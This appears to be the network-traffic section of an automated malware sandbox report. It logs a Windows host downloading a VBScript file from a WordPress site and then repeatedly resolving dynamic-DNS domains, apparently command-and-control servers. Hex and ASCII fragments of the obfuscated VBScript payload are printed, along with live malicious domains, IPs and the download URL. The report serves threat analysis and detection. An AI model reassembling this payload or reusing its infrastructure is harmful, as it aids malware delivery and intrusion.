                                    May 12, 2022 14:01:32.370001078 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.370069027 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.370403051 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.370778084 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.370806932 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.371145010 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.371299982 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.371464968 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.371814013 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.372042894 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.372473001 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.372736931 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.372853041 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.373466015 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.373778105 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.373831987 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.616535902 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.616554976 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.616723061 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.616909981 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.617022038 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.617163897 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.617264032 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.617466927 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.617640972 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.617764950 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.618072033 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.618215084 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.618221045 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.618444920 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.618472099 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.618551016 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.618733883 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.618752003 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.618769884 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.618894100 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.618925095 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.618989944 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.619012117 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.619182110 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.619213104 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.619249105 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.619271040 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.619446993 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.619462967 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.619489908 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.619532108 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.619555950 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.619577885 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.619738102 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.619867086 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.620026112 CEST49738443192.168.11.20148.66.138.165
                                    May 12, 2022 14:01:32.620049000 CEST44349738148.66.138.165192.168.11.20
                                    May 12, 2022 14:01:32.620055914 CEST49738443192.168.11.20148.66.138.165
                                    TimestampSource PortDest PortSource IPDest IP
                                    May 12, 2022 14:01:30.880023956 CEST4933953192.168.11.201.1.1.1
                                    May 12, 2022 14:01:30.908416986 CEST53493391.1.1.1192.168.11.20
                                    May 12, 2022 14:01:34.561418056 CEST5839853192.168.11.201.1.1.1
                                    May 12, 2022 14:01:35.629291058 CEST5196153192.168.11.201.1.1.1
                                    May 12, 2022 14:01:36.032222033 CEST6182253192.168.11.201.1.1.1
                                    May 12, 2022 14:01:36.149482965 CEST53618221.1.1.1192.168.11.20
                                    May 12, 2022 14:01:38.475307941 CEST5130253192.168.11.201.1.1.1
                                    May 12, 2022 14:01:38.485636950 CEST53513021.1.1.1192.168.11.20
                                    May 12, 2022 14:02:46.678739071 CEST5692353192.168.11.201.1.1.1
                                    May 12, 2022 14:02:46.795648098 CEST53569231.1.1.1192.168.11.20
                                    May 12, 2022 14:02:49.115876913 CEST5514453192.168.11.201.1.1.1
                                    May 12, 2022 14:02:49.125688076 CEST53551441.1.1.1192.168.11.20
                                    May 12, 2022 14:03:49.868005037 CEST5118253192.168.11.201.1.1.1
                                    May 12, 2022 14:03:49.973295927 CEST53511821.1.1.1192.168.11.20
                                    May 12, 2022 14:03:52.289199114 CEST6105553192.168.11.201.1.1.1
                                    May 12, 2022 14:03:52.299618959 CEST53610551.1.1.1192.168.11.20
                                    May 12, 2022 14:04:52.903026104 CEST5165953192.168.11.201.1.1.1
                                    May 12, 2022 14:04:53.010270119 CEST53516591.1.1.1192.168.11.20
                                    May 12, 2022 14:04:55.339921951 CEST5018453192.168.11.201.1.1.1
                                    May 12, 2022 14:04:55.350616932 CEST53501841.1.1.1192.168.11.20
                                    May 12, 2022 14:05:55.436346054 CEST5006853192.168.11.201.1.1.1
                                    May 12, 2022 14:05:55.546958923 CEST53500681.1.1.1192.168.11.20
                                    May 12, 2022 14:05:57.872983932 CEST5243253192.168.11.201.1.1.1
                                    May 12, 2022 14:05:57.887444019 CEST53524321.1.1.1192.168.11.20
                                    May 12, 2022 14:07:11.919681072 CEST5089853192.168.11.201.1.1.1
                                    May 12, 2022 14:07:12.034357071 CEST53508981.1.1.1192.168.11.20
                                    May 12, 2022 14:07:14.356894970 CEST6515253192.168.11.201.1.1.1
                                    May 12, 2022 14:07:14.367139101 CEST53651521.1.1.1192.168.11.20
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    May 12, 2022 14:01:30.880023956 CEST192.168.11.201.1.1.10xc6d5Standard query (0)vegproworld.comA (IP address)IN (0x0001)
                                    May 12, 2022 14:01:34.561418056 CEST192.168.11.201.1.1.10x7e5cStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                                    May 12, 2022 14:01:35.629291058 CEST192.168.11.201.1.1.10xd8a7Standard query (0)jgdbpa.am.files.1drv.comA (IP address)IN (0x0001)
                                    May 12, 2022 14:01:36.032222033 CEST192.168.11.201.1.1.10x3d7cStandard query (0)toshiba1122.duckdns.orgA (IP address)IN (0x0001)
                                    May 12, 2022 14:01:38.475307941 CEST192.168.11.201.1.1.10xd396Standard query (0)toshiba1122.ddns.netA (IP address)IN (0x0001)
                                    May 12, 2022 14:02:46.678739071 CEST192.168.11.201.1.1.10x5ae7Standard query (0)toshiba1122.duckdns.orgA (IP address)IN (0x0001)
                                    May 12, 2022 14:02:49.115876913 CEST192.168.11.201.1.1.10xbc2cStandard query (0)toshiba1122.ddns.netA (IP address)IN (0x0001)
                                    May 12, 2022 14:03:49.868005037 CEST192.168.11.201.1.1.10x3bfbStandard query (0)toshiba1122.duckdns.orgA (IP address)IN (0x0001)
                                    May 12, 2022 14:03:52.289199114 CEST192.168.11.201.1.1.10xeb3Standard query (0)toshiba1122.ddns.netA (IP address)IN (0x0001)
                                    May 12, 2022 14:04:52.903026104 CEST192.168.11.201.1.1.10xb312Standard query (0)toshiba1122.duckdns.orgA (IP address)IN (0x0001)
                                    May 12, 2022 14:04:55.339921951 CEST192.168.11.201.1.1.10xc379Standard query (0)toshiba1122.ddns.netA (IP address)IN (0x0001)
                                    May 12, 2022 14:05:55.436346054 CEST192.168.11.201.1.1.10x14a4Standard query (0)toshiba1122.duckdns.orgA (IP address)IN (0x0001)
                                    May 12, 2022 14:05:57.872983932 CEST192.168.11.201.1.1.10x7612Standard query (0)toshiba1122.ddns.netA (IP address)IN (0x0001)
                                    May 12, 2022 14:07:11.919681072 CEST192.168.11.201.1.1.10xfcabStandard query (0)toshiba1122.duckdns.orgA (IP address)IN (0x0001)
                                    May 12, 2022 14:07:14.356894970 CEST192.168.11.201.1.1.10xed5eStandard query (0)toshiba1122.ddns.netA (IP address)IN (0x0001)
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    May 12, 2022 14:01:30.908416986 CEST1.1.1.1192.168.11.200xc6d5No error (0)vegproworld.com148.66.138.165A (IP address)IN (0x0001)
                                    May 12, 2022 14:01:34.570173025 CEST1.1.1.1192.168.11.200x7e5cNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                    May 12, 2022 14:01:34.570173025 CEST1.1.1.1192.168.11.200x7e5cNo error (0)l-0004.l-dc-msedge.net13.107.43.13A (IP address)IN (0x0001)
                                    May 12, 2022 14:01:35.709649086 CEST1.1.1.1192.168.11.200xd8a7No error (0)jgdbpa.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                                    May 12, 2022 14:01:35.709649086 CEST1.1.1.1192.168.11.200xd8a7No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                                    May 12, 2022 14:01:36.149482965 CEST1.1.1.1192.168.11.200x3d7cNo error (0)toshiba1122.duckdns.org194.5.98.59A (IP address)IN (0x0001)
                                    May 12, 2022 14:01:38.485636950 CEST1.1.1.1192.168.11.200xd396No error (0)toshiba1122.ddns.net197.210.226.45A (IP address)IN (0x0001)
                                    May 12, 2022 14:02:46.795648098 CEST1.1.1.1192.168.11.200x5ae7No error (0)toshiba1122.duckdns.org194.5.98.59A (IP address)IN (0x0001)
                                    May 12, 2022 14:02:49.125688076 CEST1.1.1.1192.168.11.200xbc2cNo error (0)toshiba1122.ddns.net197.210.226.89A (IP address)IN (0x0001)
                                    May 12, 2022 14:03:49.973295927 CEST1.1.1.1192.168.11.200x3bfbNo error (0)toshiba1122.duckdns.org194.5.98.59A (IP address)IN (0x0001)
                                    May 12, 2022 14:03:52.299618959 CEST1.1.1.1192.168.11.200xeb3No error (0)toshiba1122.ddns.net197.210.226.89A (IP address)IN (0x0001)
                                    May 12, 2022 14:04:53.010270119 CEST1.1.1.1192.168.11.200xb312No error (0)toshiba1122.duckdns.org194.5.98.59A (IP address)IN (0x0001)
                                    May 12, 2022 14:04:55.350616932 CEST1.1.1.1192.168.11.200xc379No error (0)toshiba1122.ddns.net197.210.226.89A (IP address)IN (0x0001)
                                    May 12, 2022 14:05:55.546958923 CEST1.1.1.1192.168.11.200x14a4No error (0)toshiba1122.duckdns.org194.5.98.59A (IP address)IN (0x0001)
                                    May 12, 2022 14:05:57.887444019 CEST1.1.1.1192.168.11.200x7612No error (0)toshiba1122.ddns.net197.210.226.89A (IP address)IN (0x0001)
                                    May 12, 2022 14:07:12.034357071 CEST1.1.1.1192.168.11.200xfcabNo error (0)toshiba1122.duckdns.org194.5.98.59A (IP address)IN (0x0001)
                                    May 12, 2022 14:07:14.367139101 CEST1.1.1.1192.168.11.200xed5eNo error (0)toshiba1122.ddns.net197.210.226.89A (IP address)IN (0x0001)
                                    • vegproworld.com
                                    • onedrive.live.com
                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.11.2049738148.66.138.165443C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                                    TimestampkBytes transferredDirectionData
                                    2022-05-12 12:01:31 UTC0OUTGET /wp-content/Touchb.vbs HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                    Host: vegproworld.com
                                    Cache-Control: no-cache
                                    2022-05-12 12:01:32 UTC0INHTTP/1.1 200 OK
                                    Date: Thu, 12 May 2022 12:01:31 GMT
                                    Server: Apache
                                    Upgrade: h2,h2c
                                    Connection: Upgrade, close
                                    Last-Modified: Tue, 10 May 2022 23:34:55 GMT
                                    ETag: "6b0093d-3e3f5-5deb0c5a6958a"
                                    Accept-Ranges: bytes
                                    Content-Length: 254965
                                    Vary: Accept-Encoding
                                    Content-Type: text/vbscript
                                    2022-05-12 12:01:32 UTC0INData Raw: 27 53 75 70 65 72 73 74 69 6d 20 72 75 6b 61 6e 73 62 75 20 44 49 53 50 41 53 53 20 4a 75 73 74 69 74 73 72 33 20 46 49 53 4b 45 52 49 54 20 74 61 6b 6b 65 72 20 53 41 50 52 45 4d 49 41 53 20 45 6c 69 6d 36 20 73 65 64 67 65 73 65 20 46 49 4c 54 52 45 20 0d 0a 27 47 79 72 61 20 75 6e 68 75 20 46 6f 72 72 61 61 33 20 46 4f 52 4f 4d 54 41 4c 43 48 20 73 61 77 6e 69 65 72 65 20 6d 65 74 61 67 65 6f 20 49 6e 6f 66 66 65 6e 63 69 76 38 20 41 75 74 6f 6d 61 74 6f 20 52 45 46 45 4c 47 55 4c 44 20 41 4e 41 50 48 59 4c 41 43 20 6a 75 6c 65 70 73 75 6e 64 69 20 6f 6b 73 65 20 61 69 74 63 68 20 43 61 72 6f 33 20 4e 6f 75 6e 6c 65 73 73 76 34 20 4c 59 44 45 46 52 49 54 20 55 4e 53 4f 4d 42 52 45 4e 45 20 4b 45 52 41 54 4f 4d 20 4f 56 45 52 50 4f 53 54 49 4e 20 54 6f
                                    Data Ascii: 'Superstim rukansbu DISPASS Justitsr3 FISKERIT takker SAPREMIAS Elim6 sedgese FILTRE 'Gyra unhu Forraa3 FOROMTALCH sawniere metageo Inoffenciv8 Automato REFELGULD ANAPHYLAC julepsundi okse aitch Caro3 Nounlessv4 LYDEFRIT UNSOMBRENE KERATOM OVERPOSTIN To
                                    2022-05-12 12:01:32 UTC8INData Raw: 61 38 38 37 43 4d 61 38 38 37 33 43 41 4c 4c 44 43 4d 61 38 38 43 3a 43 35 33 43 41 4c 4c 43 41 4c 4c 43 43 4d 61 38 38 43 3a 43 35 39 36 43 41 4c 4c 42 4d 61 38 38 35 45 39 43 3a 43 44 39 41 43 41 4c 4c 39 39 43 41 4c 4c 44 37 43 41 4c 4c 43 43 4d 61 38 38 43 3a 43 35 33 43 41 4c 4c 37 33 38 35 4d 61 38 38 58 69 6c 6f 32 32 35 39 37 39 58 69 6c 6f 32 32 42 37 39 4d 61 38 38 43 4d 61 38 38 33 42 35 4d 61 38 38 58 69 6c 6f 32 32 4d 61 38 38 33 41 39 32 38 32 43 3a 43 45 58 69 6c 6f 32 32 43 41 4c 4c 43 43 4d 61 38 38 43 4d 61 38 38 45 43 41 4c 4c 37 35 38 35 4d 61 38 38 58 69 6c 6f 32 32 43 37 37 44 43 41 4c 4c 38 44 35 41 43 41 4c 4c 36 43 35 4d 61 38 38 33 58 69 6c 6f 32 32 4d 61 38 38 37 37 39 4d 61 38 38 39 38 33 33 43 41 4c 4c 36 43 32 42 36 39 41 43
                                    Data Ascii: a887CMa8873CALLDCMa88C:C53CALLCALLCCMa88C:C596CALLBMa885E9C:CD9ACALL99CALLD7CALLCCMa88C:C53CALL7385Ma88Xilo225979Xilo22B79Ma88CMa883B5Ma88Xilo22Ma883A9282C:CEXilo22CALLCCMa88CMa88ECALL7585Ma88Xilo22C77DCALL8D5ACALL6C5Ma883Xilo22Ma88779Ma889833CALL6C2B69AC
                                    2022-05-12 12:01:32 UTC15INData Raw: 6f 32 32 41 45 45 42 45 33 35 4d 61 38 38 42 45 43 38 45 43 3a 43 32 37 42 38 38 36 58 69 6c 6f 32 32 35 43 43 42 32 43 32 43 32 43 3a 43 35 33 43 41 4c 4c 33 4d 61 38 38 41 41 32 33 35 43 3a 43 43 38 43 3a 43 39 38 38 43 41 4c 4c 45 4d 61 38 38 37 43 41 4c 4c 45 41 41 58 69 6c 6f 32 32 43 41 36 42 37 33 43 41 4c 4c 44 39 44 43 41 4c 4c 37 39 36 43 3a 43 32 4d 61 38 38 32 43 39 4d 61 38 38 38 39 43 3a 43 41 38 44 36 32 36 4d 61 38 38 33 4d 61 38 38 33 43 3a 43 44 45 43 3a 43 41 36 43 3a 43 39 32 44 4d 61 38 38 41 44 45 43 3a 43 37 44 33 58 69 6c 6f 32 32 58 69 6c 6f 32 32 45 45 39 36 43 41 4c 4c 42 37 38 39 43 3a 43 43 37 37 4d 61 38 38 33 4d 61 38 38 43 41 4c 4c 45 43 3a 43 45 38 44 4d 61 38 38 43 43 3a 43 43 45 38 39 36 38 33 44 38 42 33 4d 61 38 38 41
                                    Data Ascii: o22AEEBE35Ma88BEC8EC:C27B886Xilo225CCB2C2C2C:C53CALL3Ma88AA235C:CC8C:C988CALLEMa887CALLEAAXilo22CA6B73CALLD9DCALL796C:C2Ma882C9Ma8889C:CA8D626Ma883Ma883C:CDEC:CA6C:C92DMa88ADEC:C7D3Xilo22Xilo22EE96CALLB789C:CC77Ma883Ma88CALLEC:CE8DMa88CC:CCE89683D8B3Ma88A
                                    2022-05-12 12:01:32 UTC23INData Raw: 4d 61 38 38 42 4d 61 38 38 45 35 58 69 6c 6f 32 32 44 32 33 58 69 6c 6f 32 32 39 45 39 43 41 4c 4c 35 32 44 44 37 44 4d 61 38 38 42 45 43 41 4c 4c 38 45 43 3a 43 35 43 41 4c 4c 58 69 6c 6f 32 32 41 43 43 41 4c 4c 4d 61 38 38 58 69 6c 6f 32 32 43 43 3a 43 4d 61 38 38 42 44 38 4d 61 38 38 32 32 38 37 43 41 4c 4c 43 41 4c 4c 33 4d 61 38 38 43 33 38 43 41 4c 4c 36 43 3a 43 44 33 32 58 69 6c 6f 32 32 33 43 41 4c 4c 33 39 36 35 4d 61 38 38 33 41 33 45 32 45 43 41 4c 4c 38 35 43 35 42 42 41 38 42 58 69 6c 6f 32 32 4d 61 38 38 35 44 32 45 4d 61 38 38 35 4d 61 38 38 42 43 43 58 69 6c 6f 32 32 43 3a 43 39 38 45 32 33 43 41 4c 4c 43 41 4c 4c 43 4d 61 38 38 43 33 42 35 36 43 37 41 43 41 4c 4c 43 4d 61 38 38 43 41 4c 4c 43 41 4c 4c 43 41 4c 4c 33 43 3a 43 35 42 42 43
                                    Data Ascii: Ma88BMa88E5Xilo22D23Xilo229E9CALL52DD7DMa88BECALL8EC:C5CALLXilo22ACCALLMa88Xilo22CC:CMa88BD8Ma882287CALLCALL3Ma88C38CALL6C:CD32Xilo223CALL3965Ma883A3E2ECALL85C5BBA8BXilo22Ma885D2EMa885Ma88BCCXilo22C:C98E23CALLCALLCMa88C3B56C7ACALLCMa88CALLCALLCALL3C:C5BBC
                                    2022-05-12 12:01:32 UTC31INData Raw: 43 3a 43 58 69 6c 22 0d 0a 66 75 6e 6b 74 69 6f 6e 73 6b 20 3d 20 66 75 6e 6b 74 69 6f 6e 73 6b 20 26 20 22 6f 32 32 41 33 35 38 58 69 6c 6f 32 32 42 44 44 43 3a 43 42 43 4d 61 38 38 32 39 43 41 4c 4c 45 43 4d 61 38 38 43 3a 43 35 43 41 4c 4c 33 38 45 35 36 39 4d 61 38 38 43 43 33 36 43 45 36 44 44 43 33 4d 61 38 38 42 58 69 6c 6f 32 32 42 41 44 42 43 35 43 3a 43 58 69 6c 6f 32 32 4d 61 38 38 37 45 45 35 43 41 4c 4c 38 36 41 44 35 36 36 58 69 6c 6f 32 32 43 4d 61 38 38 43 3a 43 35 36 58 69 6c 6f 32 32 43 58 69 6c 6f 32 32 43 44 32 32 35 58 69 6c 6f 32 32 41 43 41 4c 4c 43 43 41 4c 4c 43 58 69 6c 6f 32 32 36 43 3a 43 35 58 69 6c 6f 32 32 43 4d 61 38 38 43 3a 43 35 4d 61 38 38 32 45 58 69 6c 6f 32 32 38 58 69 6c 6f 32 32 32 38 43 3a 43 36 43 41 4c 4c 33 43
                                    Data Ascii: C:CXil"funktionsk = funktionsk & "o22A358Xilo22BDDC:CBCMa8829CALLECMa88C:C5CALL38E569Ma88CC36CE6DDC3Ma88BXilo22BADBC5C:CXilo22Ma887EE5CALL86AD566Xilo22CMa88C:C56Xilo22CXilo22CD225Xilo22ACALLCCALLCXilo226C:C5Xilo22CMa88C:C5Ma882EXilo228Xilo2228C:C6CALL3C
                                    2022-05-12 12:01:32 UTC39INData Raw: 4c 4c 43 41 4c 4c 37 4d 61 38 38 41 45 33 32 44 45 41 43 3a 43 58 69 6c 6f 32 32 36 39 58 69 6c 6f 32 32 42 58 69 6c 6f 32 32 39 58 69 6c 6f 32 32 43 3a 43 38 4d 61 38 38 58 69 6c 6f 32 32 42 37 44 45 43 36 58 69 6c 6f 32 32 43 3a 43 42 42 58 69 6c 6f 32 32 4d 61 38 38 36 4d 61 38 38 41 43 41 4c 4c 33 38 33 43 3a 43 41 32 44 42 36 43 3a 43 39 43 37 43 3a 43 37 33 43 41 4c 4c 43 41 4c 4c 43 43 3a 43 39 38 33 43 41 4c 4c 33 39 43 3a 43 32 35 35 42 43 41 4c 4c 44 37 41 43 42 33 44 4d 61 38 38 43 37 37 43 41 4c 4c 33 44 41 41 41 38 45 43 3a 43 45 44 43 41 4c 4c 36 45 38 38 33 4d 61 38 38 58 69 6c 6f 32 32 33 42 43 3a 43 43 3a 43 39 43 37 43 3a 43 37 33 43 41 4c 4c 43 41 4c 4c 43 32 38 58 69 6c 6f 32 32 38 38 37 43 41 4c 4c 43 43 4d 61 38 38 38 39 43 3a 43 44
                                    Data Ascii: LLCALL7Ma88AE32DEAC:CXilo2269Xilo22BXilo229Xilo22C:C8Ma88Xilo22B7DEC6Xilo22C:CBBXilo22Ma886Ma88ACALL383C:CA2DB6C:C9C7C:C73CALLCALLCC:C983CALL39C:C255BCALLD7ACB3DMa88C77CALL3DAAA8EC:CEDCALL6E883Ma88Xilo223BC:CC:C9C7C:C73CALLCALLC28Xilo22887CALLCCMa8889C:CD
                                    2022-05-12 12:01:32 UTC47INData Raw: 4d 61 38 38 43 3a 43 43 3a 43 33 43 41 4c 4c 43 41 4c 4c 43 4d 61 38 38 43 32 43 58 69 6c 6f 32 32 38 33 37 37 38 37 43 41 4c 4c 37 37 43 35 43 41 4c 4c 32 58 69 6c 6f 32 32 35 43 41 4c 4c 39 44 37 37 38 4d 61 38 38 32 45 42 35 4d 61 38 38 43 3a 43 45 43 3a 43 37 42 36 32 42 4d 61 38 38 43 33 35 43 43 41 4c 4c 41 58 69 6c 6f 32 32 32 35 4d 61 38 38 41 43 41 4c 4c 43 3a 43 41 38 45 44 42 44 43 43 41 4c 4c 41 42 4d 61 38 38 43 32 44 37 45 39 43 3a 43 43 3a 43 41 43 3a 43 32 42 37 43 41 43 41 4c 4c 33 35 35 44 41 43 41 4c 4c 38 39 43 41 4c 4c 36 43 4d 61 38 38 4d 61 38 38 38 43 33 33 45 43 41 4c 4c 37 36 37 37 37 44 43 41 4c 4c 35 33 45 43 41 4c 4c 43 43 4d 61 38 38 41 44 45 42 37 33 43 4d 61 38 38 43 3a 43 35 43 41 4c 4c 33 38 44 44 42 39 35 38 4d 61 38 38
                                    Data Ascii: Ma88C:CC:C3CALLCALLCMa88C2CXilo22837787CALL77C5CALL2Xilo225CALL9D778Ma882EB5Ma88C:CEC:C7B62BMa88C35CCALLAXilo2225Ma88ACALLC:CA8EDBDCCALLABMa88C2D7E9C:CC:CAC:C2B7CACALL355DACALL89CALL6CMa88Ma888C33ECALL76777DCALL53ECALLCCMa88ADEB73CMa88C:C5CALL38DDB958Ma88
                                    2022-05-12 12:01:32 UTC55INData Raw: 4d 61 38 38 36 33 43 37 37 39 58 69 6c 6f 32 32 4d 61 38 38 41 44 43 3a 43 42 43 41 4c 4c 43 43 4d 61 38 38 43 3a 43 35 39 37 43 44 38 45 58 69 6c 6f 32 32 39 42 45 45 43 35 43 58 69 6c 6f 32 32 41 41 41 58 69 6c 6f 32 32 43 39 33 58 69 6c 6f 32 32 45 41 38 4d 61 38 38 38 41 43 41 45 36 33 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61
                                    Data Ascii: Ma8863C779Xilo22Ma88ADC:CBCALLCCMa88C:C597CD8EXilo229BEEC5CXilo22AAAXilo22C93Xilo22EA8Ma888ACAE63Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma
                                    2022-05-12 12:01:32 UTC62INData Raw: 43 41 4c 4c 43 58 69 6c 6f 32 32 38 58 69 6c 6f 32 32 33 4d 61 38 38 43 3a 43 43 3a 43 42 43 3a 43 43 3a 43 38 43 3a 43 4d 61 38 38 43 3a 43 36 39 37 37 43 3a 43 43 3a 43 33 43 41 4c 4c 43 41 4c 4c 43 42 43 41 4c 4c 43 3a 43 32 42 43 37 39 35 43 43 3a 43 35 33 43 41 4c 4c 43 41 4c 4c 43 43 58 69 6c 6f 32 32 32 33 43 38 33 43 41 4c 4c 43 3a 43 33 4d 61 38 38 58 69 6c 6f 32 32 33 45 32 42 43 3a 43 35 38 43 3a 43 37 36 33 42 43 3a 43 35 41 39 33 45 43 41 4c 4c 43 43 4d 61 38 38 42 43 3a 43 58 69 6c 6f 32 32 43 43 3a 43 33 45 45 43 58 69 6c 6f 32 32 43 58 69 6c 6f 32 32 37 44 43 3a 43 35 41 39 33 45 43 41 4c 4c 43 43 4d 61 38 38 36 37 32 36 38 35 4d 61 38 38 36 43 43 3a 43 38 41 58 69 6c 6f 32 32 4d 61 38 38 43 58 69 6c 6f 32 32 43 3a 43 35 33 43 41 4c 4c 37
                                    Data Ascii: CALLCXilo228Xilo223Ma88C:CC:CBC:CC:C8C:CMa88C:C6977C:CC:C3CALLCALLCBCALLC:C2BC795CC:C53CALLCALLCCXilo2223C83CALLC:C3Ma88Xilo223E2BC:C58C:C763BC:C5A93ECALLCCMa88BC:CXilo22CC:C3EECXilo22CXilo227DC:C5A93ECALLCCMa88672685Ma886CC:C8AXilo22Ma88CXilo22C:C53CALL7
                                    2022-05-12 12:01:32 UTC70INData Raw: 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 22 0d 0a 66 75 6e 6b 74 69 6f 6e 73 6b 20 3d 20 66 75 6e 6b 74 69 6f 6e 73 6b 20 26 20 22 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 37 4d 61 38 38 4d 61 38 38 36 33 43 58 69 6c 6f 32 32 45 43 43 3a 43 43 3a 43 32 36 41 41 33 33 44 33 43 41 4c 4c 39 39 44 4d 61 38 38 41 33 42 4d 61 38 38 33 43 35 43 44 37 38 33 45 37 4d 61 38 38 43 41 42 32 36 44 58 69 6c 6f 32 32 43 4d 61 38 38 41 32 39 41 32 36 43 3a 43 42 42 33 45 44 4d 61 38 38 43 3a 43 35 35 39 4d 61 38 38 42 4d 61 38 38 58 69 6c 6f 32 32 43 3a 43 43 58 69 6c 6f 32 32 43
                                    Data Ascii: 8Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma88"funktionsk = funktionsk & "63C7Ma88Ma8863C7Ma88Ma8863C7Ma88Ma8863CXilo22ECC:CC:C26AA33D3CALL99DMa88A3BMa883C5CD783E7Ma88CAB26DXilo22CMa88A29A26C:CBB3EDMa88C:C559Ma88BMa88Xilo22C:CCXilo22C
